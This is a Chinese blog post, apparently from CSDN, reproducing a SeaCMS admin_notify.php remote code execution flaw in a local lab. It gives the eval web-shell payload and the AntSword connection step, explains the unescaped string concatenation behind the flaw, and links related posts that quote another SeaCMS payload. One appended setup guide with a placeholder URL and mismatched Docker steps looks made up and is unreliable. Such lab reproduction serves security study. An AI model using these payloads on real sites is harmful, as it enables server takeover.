SeaCMS海洋影视管理系统远程代码执行漏洞复现

已于 2024-07-27 17:32:34 修改
阅读量2.8k 收藏 7
点赞数 9
文章标签: 安全
于 2024-07-27 13:39:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/holyxp/article/details/140734295
版权

SeaCMS海洋影视管理系统远程代码执行漏洞复现

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、环境搭建

首先搭建靶场环境

我们需要提前准备好一个正常使用的小皮面板

然后我们把提前准备好的压缩包解压出来并且放置到小皮面板的网站目录下

我的小皮面板服务目录在C:\phpstudy_pro\WWW

然后把刚刚的某洋cms放置到www目录下

在这里插入图片描述
然后我们可以通过网页来进行访问然后安装,我的ip是192.168.1.57

所以就去到http://192.168.1.57/SeaCMS_12.9/Upload/install/index.php这个文件来进行安装操作,打开此url会出现下面的界面,然后点击右下角的开始
在这里插入图片描述

直接同意

在这里插入图片描述
在这里插入图片描述

信息无误后点击下一步

下一步之后就需要我们填写数据库密码了,其他如果小皮没有变化就直接不管
在这里插入图片描述

点击下一步即可看见安装完成
在这里插入图片描述

Ⅱ、漏洞复现

接下来正式开始复现

http://192.168.212.133/SeaCMS_12.9/Upload/s2bj3v

首先我们去到http://192.168.1.57/SeaCMS_12.9/Upload/ew6sv/这个文件目录
在这里插入图片描述
在这里插入图片描述

因为我们是直接在这里安装的,保存了我们的cookie所以我们就直接进来了,如果没有直接进来也不要紧,直接弱密码账户admin 密码admin就行了
在这里插入图片描述

注意ew6sv这个目录是上图自动生成的

然后我们可以直接去到

http://192.168.1.57/SeaCMS_12.9/Upload/ew6sv/admin_notify.php

这个地址下的admin_notify.php文件

在这里插入图片描述

然后我们只需要在这里输入

1";@eval($_POST[cmd]);;//

然后下面的随便填,就像这样子

在这里插入图片描述

点击确认

确认后我们去到

http://192.168.1.57/SeaCMS_12.9/Upload/data/admin/notify.php

这个位置,这里便是我们刚刚写入马子的位置

直接打开蚁剑就可以直接正向连接了
在这里插入图片描述

Ⅲ、漏洞分析

然后是代码审计

我们可以分别看一下这俩php文件到底发生了什么导致了RCE

在这里插入图片描述

首先是他以写模式打开了

http://192.168.1.57/SeaCMS_12.9/Upload/data/admin/notify.php

这个地方的notify.php文件然后把内容拼接了上去,但是并没有检查拼接的字符串中是否存在特殊字符,而直接进去了

然后我们看一下写入的内容

在这里插入图片描述
很明显我们输入的双引号把变量前面的内容给闭合了,然后后面有双斜杠直接注释了后方的内容,所以就导致了我们利用蚁剑来正向shell

海洋CMS admin_notify.php 远程代码执行漏洞复现(CVE-2024-30565)
0xSec
06-12 1743
海洋CMS admin_notify.php 接口处存在远程代码执行漏洞,经过身份验证的远程攻击者可利用该漏洞执行任意代码,写入后门文件,进而控制整个web服务器。
海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞复现(CVE-2024-29275)
0xSec
06-12 1358
海洋CMS影视管理系统 /js/player/dmplayer/dmku/ 接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
seacms 远程命令执行 (CNVD-2020-22721)漏洞复现
weixin_42675091的博客
09-06 1679
seacms 远程命令执行 (CNVD-2020-22721)漏洞复现
seacms漏洞
最新发布
2201_75544326的博客
03-03 295
海洋影视管理系统seacms海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采用的是 php5.X+mysql 的架构,seacmsv9漏洞文件:./comment/api/index.php,漏洞参数:$rlist。
seacms_CNVD-2020-22721_v10.1漏洞分析与复现
一个努力学习网安的小牛马
10-27 1895
seacms漏洞复现详情
[漏洞复现]seacms(v6.53)代码执行漏洞
Vicl1fe的博客
12-30 4168
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://blog.csdn.net/weixin_44897902/article/details/100853036 https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg 环境: 链接:https://pan.ba...
seacms海洋cms漏洞
YouthBelief的博客
10-29 6707
seacms海洋cms漏洞前言一、seacms 远程命令执行 (CNVD-2020-22721)0x01 漏洞描述0x02 漏洞利用拿shell总结 前言 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 一、seacms 远程命令执行 (CNVD-2020-22721) 0x01 漏洞描述 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台
漏洞复现海洋CMS6.28远程代码执行
weixin_47443077的博客
05-17 2764
漏洞复现海洋CMS6.28远程代码执行 文章目录【漏洞复现海洋CMS6.28远程代码执行一、漏洞背景二、漏洞原理三、漏洞复现 一、漏洞背景 海洋影视管理系统seacms海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 该CMS6.28版本存在命令执行漏洞,攻击者可以通过远程命令执行入侵被攻击者主机。 二、漏洞原理 area参数处理过的地方经过字符是否非法判断之后,调用ech
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6010
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1952
seaCms-命令执行】后门代码写入可解析文件中
WEB漏洞之:海洋CMS代码执行(CNVD-2020-22721)
一位热爱网安的年轻人的博客
11-18 1867
web安全漏洞复现之:海洋cms远程代码执行
Seacms漏洞
Grey的博客
07-10 5169
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...
seacms admin_ip.php RCE (CVE-2022-48093) 漏洞复现
weixin_68999845的博客
07-31 686
改内容写入的是 .php 文件内的,观察请求的payload是否是恶意的php语句,分析其作用,在本地测试即可(若写入一句话木马,用antswords连接.php文件观察是否成功即可)1.下载源码到本地:https://github.com/seacms-com/seacms。1.登录后台(在配置环境时,后台地址时随机生成的,本次地址为:seacms-master/源码下载url:https://github.com/seacms-com/seacms。以下版本受该漏洞影响:seacms全版本。
Seacms漏洞分析利用复现 By Assassin
热门推荐
Assassin
08-03 1万+
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示=== ------------------------------------- 【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼
Seacms漏洞分析利用
weixin_30546189的博客
01-29 372
http://blog.csdn.net/qq_35078631/article/details/76595817 转载于:https://www.cnblogs.com/liuzhi/p/8376635.html
SeaCMS海洋CMS)存在MySQL慢查询漏洞(CNVD-2024-39253、CVE-2024-46640)
护卫神的博客
11-19 237
SeaCMS海洋CMS)是一款开源免费PHP影视系统,因其功能强大,操作使用简单,拥有大量用户。国家信息安全漏洞共享平台于2024-09-26公布其存在MySQL慢查询漏洞
WEB 漏洞seacms 远程命令执行(CNVD-2020-22721)
2301_79118231的博客
10-27 738
注:个人笔记,并不全面,仅供参考。
[PHP代码审计]SEACMS命令执行漏洞
Y4tacker的博客
05-31 1861
文章目录写在前面漏洞演示漏洞点分析 写在前面 考虑到是后台,且后台目录随机,感觉危害不太大,所以分享思路,这里是防御过度造成的,两个waf的利用导致参数逃逸,希望给大家的审计学习带来帮助 漏洞演示 漏洞点在后台的图片水印设置 在这里我们用burpSuite拦截包,之后我们要修改三个地方,我把参数列出来 ------WebKitFormBoundaryiU3RjTlx8jjXvZLM Content-Disposition: form-data; name="photo_watertext" www.se
海洋cms靶场本地搭建
01-13
### 如何在本地环境搭建海洋CMS靶场 #### 准备工作 为了成功部署海洋CMS靶场,在开始之前需确保计算机满足最低硬件需求并安装必要的软件包。操作系统建议采用Linux发行版,如Ubuntu LTS版本[^1]。 #### 安装依赖项 通过命令行工具更新现有软件包列表,并安装构建和运行Ocean CMS所需的库文件以及开发工具链。对于基于Debian/Ubuntu系统的机器可以执行如下指令来完成这一步骤: ```bash sudo apt-get update && sudo apt-get upgrade -y sudo apt-get install build-essential libssl-dev libffi-dev python3-dev python3-pip nginx git -y ``` #### 获取源码仓库 利用Git克隆官方GitHub上的项目存储库到本地磁盘位置以便进一步操作。假设目标目录为`~/ocean_cms_range`: ```bash cd ~/ git clone https://github.com/example/ocean-cms-range.git ocean_cms_range ``` 请注意实际URL应替换为真实的地址[^2]。 #### 配置虚拟环境与Python依赖管理 创建独立于全局解释器的新Python环境用于隔离第三方模块的影响;进入上述路径下的工程根目录之后继续输入以下命令片段初始化该过程: ```bash cd ~/ocean_cms_range python3 -m venv .venv source .venv/bin/activate pip install --upgrade pip setuptools wheel pip install -r requirements.txt ``` #### 数据库设置 按照README.md文档中的指导说明配置关系型数据库(MySQL/MariaDB),并将相应连接字符串写入`.env`文件内指定变量中去。此步骤可能涉及到新建用户账号授权访问权限等问题,请参照具体产品手册处理[^3]。 #### 启动服务端应用 当所有前置条件都已妥善安排完毕,则可以通过Docker Compose一键启动整个平台的服务组件集合体。在此之前先确认docker-compose.yml配置无误后再尝试下面的操作方法: ```bash docker-compose up -d --build ``` 此时应该可以在浏览器里打开http://localhost:8000查看默认首页界面了[^4]。 #### 测试验证功能正常与否 最后但同样重要的是要对刚刚建立起来的实例进行全面的功能测试以确保其能够稳定可靠地提供预期之外的价值给最终使用者带来良好的体验感。可借助自动化脚本或者手动方式逐条检验各项特性是否符合设计初衷的要求[^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全攻防赵小龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值